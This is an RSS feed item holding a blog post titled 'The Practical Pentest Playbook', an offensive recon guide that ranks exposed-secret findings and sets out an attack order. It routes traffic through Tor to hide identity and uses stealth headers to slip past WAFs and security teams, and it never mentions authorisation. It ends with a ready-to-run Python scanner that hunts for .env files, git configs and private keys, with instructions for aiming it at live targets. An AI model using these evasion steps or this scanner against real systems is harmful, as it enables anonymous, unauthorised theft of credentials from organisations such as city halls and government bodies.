<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>Pentest on Dotmind it</title><link>/tags/pentest/</link><description>Dotmind it (Pentest)</description><generator>Hugo -- gohugo.io</generator><language>en</language><managingEditor>alwaysdotmind@gmail.com
(Dotmind it. Building where things usually break)</managingEditor><lastBuildDate>Mon, 22 Jun 2026 16:20:00 +0000</lastBuildDate><atom:link href="/tags/pentest/index.xml" rel="self" type="application/rss+xml"/><item><title>The Practical Pentest Playbook</title><link>/posts/2026/ai/pentest-playbook/</link><pubDate>Mon, 22 Jun 2026 16:20:00 +0000</pubDate><author>alwaysdotmind@gmail.com (Dotmind it. Building where things usually break)</author><guid>/posts/2026/ai/pentest-playbook/</guid><description>&lt;!-- Finding and Exploiting Exposed Web and Cloud Assets --&gt;
&lt;hr&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Author&amp;rsquo;s Note:&lt;/strong&gt; This playbook is a living document updated continuously as new techniques are validated in the field. If a technique is here, it shipped results. The content of this playbook is also used to train and fine-tune offensive security agents, making the knowledge directly executable. Contributions, corrections, and new findings are always welcome.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h1 id="playbook---pentest--recon" &gt;
&lt;div&gt;
&lt;a href="#playbook---pentest--recon"&gt;
##
&lt;/a&gt;
PLAYBOOK - PENTEST &amp;amp; RECON
&lt;/div&gt;
&lt;/h1&gt;
&lt;p&gt;Technical guide to methodology, techniques, risks, and automation for offensive pentests.
Based on real field experience across 100+ targets — city halls, government, healthtech, logistics, fintech, e-commerce, ISPs, universities, game publishers, IP cameras, and more.&lt;/p&gt;
&lt;hr&gt;
&lt;h2 id="index" &gt;
&lt;div&gt;
&lt;a href="#index"&gt;
#
&lt;/a&gt;
INDEX
&lt;/div&gt;
&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href="#1-philosophy--mindset"&gt;Philosophy &amp;amp; Mindset&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#2-preparation--opsec"&gt;Preparation &amp;amp; OPSEC&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#3-passive-reconnaissance"&gt;Passive Reconnaissance&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#4-active-reconnaissance--nmap-masscan-and-rustscan"&gt;Active Reconnaissance — Nmap, Masscan, and RustScan&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#5-web-enumeration"&gt;Web Enumeration&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#6-js-bundle--source-map-analysis"&gt;JS Bundle &amp;amp; Source Map Analysis&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#7-wordpress-deep-dive"&gt;WordPress Deep Dive&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#8-laravel-spring-boot-aspnet--other-frameworks"&gt;Laravel, Spring Boot, ASP.NET, Exchange &amp;amp; Other Frameworks&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#9-cloud-functions--serverless-gcp-aws"&gt;Cloud Functions &amp;amp; Serverless (GCP, AWS)&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#10-firebase-firestore--gcp-exploitation"&gt;Firebase, Firestore &amp;amp; GCP Exploitation&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#11-supabase-exploitation"&gt;Supabase Exploitation&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#12-cloud-run-containers--artifact-registry"&gt;Cloud Run, Containers &amp;amp; Artifact Registry&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#13-s3--minio--blob-storage"&gt;S3 / MinIO / Blob Storage&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#14-code-leaks--github-gitlab-docker-hub-npm"&gt;Code Leaks — GitHub, GitLab, Docker Hub, NPM&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#15-authentication--bypass"&gt;Authentication &amp;amp; Bypass&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#16-jwt--complete-attacks"&gt;JWT — Complete Attacks&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#17-cors-misconfiguration"&gt;CORS Misconfiguration&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#18-web-cache-poisoning--web-cache-deception"&gt;Web Cache Poisoning &amp;amp; Web Cache Deception&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#19-ssrf-sqli-lfi--other-classes"&gt;SSRF, SQLi, LFI &amp;amp; Other Classes&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#20-exposed-infrastructure--mysql-redis-ftp-docker"&gt;Exposed Infrastructure — MySQL, Redis, FTP, Docker&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#21-docker-privilege-escalation"&gt;Docker Privilege Escalation&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#22-python-snippets--automation"&gt;Python Snippets &amp;amp; Automation&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#23-email-security--dmarc-spf-dkim"&gt;Email Security — DMARC, SPF, DKIM&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#24-subdomain-takeover--dns"&gt;Subdomain Takeover &amp;amp; DNS&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#25-advanced-field-techniques"&gt;Advanced Field Techniques&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#26-advanced-techniques--part-2"&gt;Advanced Techniques — Part 2&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#27-report--triage-methodology"&gt;Report &amp;amp; Triage Methodology&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#28-final-checklist"&gt;Final Checklist&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#29-essential-tools"&gt;Essential Tools&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#30-technique-effectiveness-summary"&gt;Technique Effectiveness Summary&lt;/a&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;hr&gt;
&lt;h2 id="1-philosophy--mindset" &gt;
&lt;div&gt;
&lt;a href="#1-philosophy--mindset"&gt;
#
&lt;/a&gt;
1. PHILOSOPHY &amp;amp; MINDSET
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="pentester-mindset" &gt;
&lt;div&gt;
&lt;a href="#pentester-mindset"&gt;
##
&lt;/a&gt;
Pentester Mindset
&lt;/div&gt;
&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Work the edges&lt;/strong&gt;: don&amp;rsquo;t focus on what&amp;rsquo;s blocked, explore what&amp;rsquo;s open.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;One finding leads to another&lt;/strong&gt;: &lt;code&gt;.env&lt;/code&gt; → credentials → Firebase → GCP IAM → everything.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Don&amp;rsquo;t spam&lt;/strong&gt;: rate limiting burns your IP. 1 request every 2-3 seconds.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Document everything&lt;/strong&gt;: what you discover today may be useful tomorrow.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Think like a developer&lt;/strong&gt;: &amp;ldquo;Where would I put credentials? Where would I forget to lock down?&amp;rdquo;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Every target has something&lt;/strong&gt;: across 100+ tested targets, NONE was 100% secure.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Prioritize what matters&lt;/strong&gt;: CRUD without auth &amp;gt; info disclosure &amp;gt; low severity.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="finding-value-hierarchy" &gt;
&lt;div&gt;
&lt;a href="#finding-value-hierarchy"&gt;
##
&lt;/a&gt;
Finding Value Hierarchy
&lt;/div&gt;
&lt;/h3&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;.env / .git exposed → 🔥🔥🔥 full access to credentials
CRUD without auth (API, Firestore, Supabase) → 🔥🔥🔥 bulk data, write
Firebase / Supabase public anon key → 🔥🔥🔥 full collection dump
Leaked source code (public GitLab, Vite dev) → 🔥🔥🔥 secrets, logic, endpoints
Cloud Function without auth (GET + DELETE) → 🔥🔥🔥 leakage + destruction
Exposed RSA private key → 🔥🔥 forge JWT (if jti in DB)
JWT secret hardcoded in JS bundle → 🔥🔥 forge any user&amp;#39;s tokens
APP_DEBUG=true in production → 🔥🔥 stack traces, SQL, paths
Exposed logs (laravel.log, debug.log) → 🔥🔥 tokens, emails, queries
Public Cloud Run without auth → 🔥🔥 execution without authentication
Leaked IAM policy via SA key → 🔥🔥 owners, editors, service accounts
MySQL/Postgres exposed to the internet → 🔥🔥 brute force, known CVEs
DMARC p=none → 🔥🔥 spoofed mail is only reported, never rejected
CORS with origin reflection + credentials → 🔥🔥 cross-origin data theft
Web Cache Deception (WCD) → 🔥🔥 authenticated data theft
Active WordPress XML-RPC (80 methods) → 🔥🔥 unlimited brute force
SQLi (even blind) → 🔥🔥 data extraction
&lt;/code&gt;&lt;/pre&gt;&lt;h3 id="exploration-order" &gt;
&lt;div&gt;
&lt;a href="#exploration-order"&gt;
##
&lt;/a&gt;
Exploration Order
&lt;/div&gt;
&lt;/h3&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;1. Port scan (RustScan/Masscan) on direct IP
2. Test /.env, /.git/config, /Dockerfile, /storage/oauth-private.key
3. If credentials found → authenticate and escalate
4. Analyze JS bundles for API keys, JWTs, internal endpoints
5. Test CORS, cache poisoning, WCD
6. If Firebase found → test public Firestore + Storage
7. If Supabase found → list tables with anon key
8. If GCP SA key found → IAM policy, Storage, Firestore
9. With cloud access → list functions, containers, artifact registry
10. Document everything and prioritize by impact
&lt;/code&gt;&lt;/pre&gt;&lt;hr&gt;
&lt;h2 id="2-preparation--opsec" &gt;
&lt;div&gt;
&lt;a href="#2-preparation--opsec"&gt;
#
&lt;/a&gt;
2. PREPARATION &amp;amp; OPSEC
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="proxyvpn--protection-layer" &gt;
&lt;div&gt;
&lt;a href="#proxyvpn--protection-layer"&gt;
##
&lt;/a&gt;
Proxy/VPN — Protection Layer
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;There are two levels of identity protection, plus circuit rotation to change the exit IP between runs:&lt;/p&gt;
&lt;h4 id="level-1-proxychains-fast-but-bypassable" &gt;
&lt;div&gt;
&lt;a href="#level-1-proxychains-fast-but-bypassable"&gt;
###
&lt;/a&gt;
Level 1: ProxyChains (fast, but bypassable)
&lt;/div&gt;
&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sudo apt install proxychains4 tor
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Config: /etc/proxychains4.conf → socks5 127.0.0.1 9050&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;proxychains4 curl ifconfig.me
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Limitations&lt;/strong&gt;: proxychains hooks libc socket calls through &lt;code&gt;LD_PRELOAD&lt;/code&gt;, so statically linked binaries (most Go and many Rust tools) bypass it entirely and talk to the target directly. UDP is never proxied, and DNS leaks unless &lt;code&gt;proxy_dns&lt;/code&gt; is enabled in the config. Always confirm with &lt;code&gt;proxychains4 curl ifconfig.me&lt;/code&gt; before pointing a tool at a target.&lt;/p&gt;
&lt;h4 id="level-2-proxy-ns-kernel-level-impossible-to-escape" &gt;
&lt;div&gt;
&lt;a href="#level-2-proxy-ns-kernel-level-impossible-to-escape"&gt;
###
&lt;/a&gt;
Level 2: proxy-ns (kernel-level, impossible to escape)
&lt;/div&gt;
&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;git clone https://github.com/OkamiW/proxy-ns.git /tmp/proxy-ns
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#99d1db"&gt;cd&lt;/span&gt; /tmp/proxy-ns
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f2d5cf"&gt;CGO_ENABLED&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;0&lt;/span&gt; make
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sudo cp proxy-ns /usr/local/bin/
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Forces all traffic through Tor using kernel network namespace&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sudo proxy-ns curl -s ifconfig.me &lt;span style="color:#737994;font-style:italic"&gt;# Single command&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sudo proxy-ns &lt;span style="color:#f2d5cf"&gt;$SHELL&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Entire shell via Tor&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Advantages&lt;/strong&gt;: the process runs inside a network namespace whose only way out is the proxy, so statically linked Go/Rust binaries are covered, UDP and DNS stay inside the namespace, and there is no direct route left to leak through.&lt;/p&gt;
&lt;h4 id="tor-circuit-rotation-change-ip" &gt;
&lt;div&gt;
&lt;a href="#tor-circuit-rotation-change-ip"&gt;
###
&lt;/a&gt;
Tor Circuit Rotation (change IP)
&lt;/div&gt;
&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Enable ControlPort in /etc/tor/torrc&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ControlPort &lt;span style="color:#ef9f76"&gt;9051&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;CookieAuthentication &lt;span style="color:#ef9f76"&gt;0&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Unauthenticated control port: keep it bound to 127.0.0.1 only, or set HashedControlPassword instead&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Rotate&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#99d1db"&gt;echo&lt;/span&gt; -e &lt;span style="color:#a6d189"&gt;&amp;#34;AUTHENTICATE\r\nSIGNAL NEWNYM&amp;#34;&lt;/span&gt; | nc -w1 127.0.0.1 &lt;span style="color:#ef9f76"&gt;9051&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sleep &lt;span style="color:#ef9f76"&gt;2&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Tor rate-limits NEWNYM to about one every 10 s; rotating faster just delays the new circuit&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sudo proxy-ns curl -s ifconfig.me &lt;span style="color:#737994;font-style:italic"&gt;# New IP&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="stealth-headers-python" &gt;
&lt;div&gt;
&lt;a href="#stealth-headers-python"&gt;
##
&lt;/a&gt;
Stealth Headers (Python)
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;import&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;requests&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;,&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;random&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;,&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;time&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;UAS &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; [
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0.0.0&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Safari/605.1.15&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;Mozilla/5.0 (X11; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;headers &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;User-Agent&amp;#34;&lt;/span&gt;: random&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;choice(UAS),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;Accept&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;Accept-Language&amp;#34;&lt;/span&gt;: random&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;choice([&lt;span style="color:#a6d189"&gt;&amp;#34;pt-BR,pt;q=0.9&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;en-US,en;q=0.5&amp;#34;&lt;/span&gt;]),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;Accept-Encoding&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;gzip, deflate&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;DNT&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;1&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;Connection&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;keep-alive&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;Upgrade-Insecure-Requests&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;1&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;time&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;sleep(random&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;uniform(&lt;span style="color:#ef9f76"&gt;2&lt;/span&gt;, &lt;span style="color:#ef9f76"&gt;6&lt;/span&gt;)) &lt;span style="color:#737994;font-style:italic"&gt;# Jitter between requests&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="real-exposure-risks" &gt;
&lt;div&gt;
&lt;a href="#real-exposure-risks"&gt;
##
&lt;/a&gt;
Real Exposure Risks
&lt;/div&gt;
&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Risk&lt;/th&gt;
&lt;th&gt;How It Happens&lt;/th&gt;
&lt;th&gt;Consequence&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Leaked IP&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Server logs, WebRTC, DNS leaks&lt;/td&gt;
&lt;td&gt;Blocking, tracking&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Fingerprinting&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;User-Agent, TLS fingerprint (JA3), headers&lt;/td&gt;
&lt;td&gt;Identified as bot&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Rate Limit&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Too many requests in a short period&lt;/td&gt;
&lt;td&gt;IP permanently blocked&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Honeypot&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Fake endpoint that alerts the security team&lt;/td&gt;
&lt;td&gt;Legal action&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;SIEM/Splunk&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Centralized logs detect patterns&lt;/td&gt;
&lt;td&gt;Security team alerted&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Cloudflare WAF&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Many sequential 403/503&lt;/td&gt;
&lt;td&gt;IP added to blacklist&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Tracked SA Key&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Excessive service account usage&lt;/td&gt;
&lt;td&gt;Key revoked&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;GitHub API&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Too many queries on the search API&lt;/td&gt;
&lt;td&gt;Rate limit, token revoked&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
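&lt;p&gt;The table above lists what burns an IP; the exploration order in section 1 lists what to probe first. The following Python ties the two together and is an added worked example, not code from the original playbook: it requests the step-2 paths (&lt;code&gt;/.env&lt;/code&gt;, &lt;code&gt;/.git/config&lt;/code&gt;, &lt;code&gt;/Dockerfile&lt;/code&gt;, &lt;code&gt;/storage/oauth-private.key&lt;/code&gt;) with a rotating browser-like header set and a jittered delay, doubles the delay whenever the target answers 429/403/503 (the Rate Limit and WAF rows), and only counts a hit when the body carries the signature that file should have, so a single-page app that returns 200 for every path does not become a false finding. The HTTP client is injected; &lt;code&gt;demo_fetch&lt;/code&gt;, &lt;code&gt;SAMPLE_SITE&lt;/code&gt;, the &lt;code&gt;Throttle&lt;/code&gt; class and the host &lt;code&gt;example.invalid&lt;/code&gt; are constructed for the example and stand in for a live target.&lt;/p&gt;

```python
import random
import re
import time

# Added example, not the playbook's own tooling. Step-2 paths from the
# exploration order, each paired with a body signature that must match for
# the hit to count: a bare 200 is not a finding, since many stacks answer
# every unknown path with the SPA shell or a soft-404 page.
PROBES = {
    "/.env": re.compile(r"^[A-Z][A-Z0-9_]*=", re.M),
    "/.git/config": re.compile(r"^\[core\]", re.M),
    "/Dockerfile": re.compile(r"^FROM\s+\S+", re.M),
    "/storage/oauth-private.key": re.compile(r"-----BEGIN (RSA )?PRIVATE KEY-----"),
}

UAS = [
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15",
    "Mozilla/5.0 (X11; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0",
]


def stealth_headers(rng):
    """Browser-like header set with the User-Agent re-picked per request."""
    return {
        "User-Agent": rng.choice(UAS),
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": rng.choice(["pt-BR,pt;q=0.9", "en-US,en;q=0.5"]),
        "Accept-Encoding": "gzip, deflate",
        "Connection": "keep-alive",
    }


class Throttle:
    """Jittered pause between requests. After a 429/403/503 the base delay
    doubles (capped at 60 s), so a WAF that starts pushing back slows the
    scan down instead of receiving a burst that ends in a ban."""

    def __init__(self, base=2.0, jitter=1.0, sleep=time.sleep, rng=random):
        self.base = base
        self.jitter = jitter
        self._sleep = sleep
        self._rng = rng

    def wait(self):
        self._sleep(self.base + self._rng.uniform(0, self.jitter))

    def penalize(self):
        self.base = min(self.base * 2, 60.0)


def probe(base_url, fetch, throttle, rng=random):
    """fetch(url, headers) returns (status, body). Returns the paths whose
    body matched the expected signature; rate-limit responses back off."""
    hits = []
    for path, signature in PROBES.items():
        throttle.wait()
        status, body = fetch(base_url + path, stealth_headers(rng))
        if status in (403, 429, 503):
            throttle.penalize()
            continue
        if status == 200 and signature.search(body):
            hits.append(path)
    return hits


# Constructed responses standing in for a live target: an exposed .env, a
# SPA shell answering 200 for /.git/config, no Dockerfile, and a Laravel
# Passport private key left world-readable.
SAMPLE_SITE = {
    "/.env": (200, "APP_ENV=production\nAPP_DEBUG=true\nDB_PASSWORD=s3cr3t\n"),
    "/.git/config": (200, "Single-page app shell, served for every unknown path"),
    "/Dockerfile": (404, ""),
    "/storage/oauth-private.key": (200, "-----BEGIN RSA PRIVATE KEY-----\nconstructed-key-body\n-----END RSA PRIVATE KEY-----\n"),
}


def demo_fetch(url, headers):
    """Offline stand-in for an HTTP client; matches on the path suffix."""
    for path, response in SAMPLE_SITE.items():
        if url.endswith(path):
            return response
    return (404, "")


def run_demo():
    """Probe the constructed site without real sleeping; returns confirmed hits."""
    throttle = Throttle(sleep=lambda seconds: None, rng=random.Random(7))
    return probe("https://example.invalid", demo_fetch, throttle, rng=random.Random(7))


def run_rate_limited_demo():
    """Every request answered 429: no hits, and the base delay doubled once
    per probe, from 2 s to 32 s across the four paths."""
    throttle = Throttle(sleep=lambda seconds: None, rng=random.Random(7))
    hits = probe("https://example.invalid", lambda url, headers: (429, ""), throttle, rng=random.Random(7))
    return hits, throttle.base
```

&lt;p&gt;Against the constructed site only &lt;code&gt;/.env&lt;/code&gt; and the Passport key are reported; the SPA shell behind &lt;code&gt;/.git/config&lt;/code&gt; is rejected because it lacks a &lt;code&gt;[core]&lt;/code&gt; section. To use it for real, replace &lt;code&gt;demo_fetch&lt;/code&gt; with a wrapper around a real client that returns &lt;code&gt;(status, text)&lt;/code&gt;, run it under proxy-ns as shown above, and extend &lt;code&gt;PROBES&lt;/code&gt; with the other paths from the exploration order.&lt;/p&gt;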
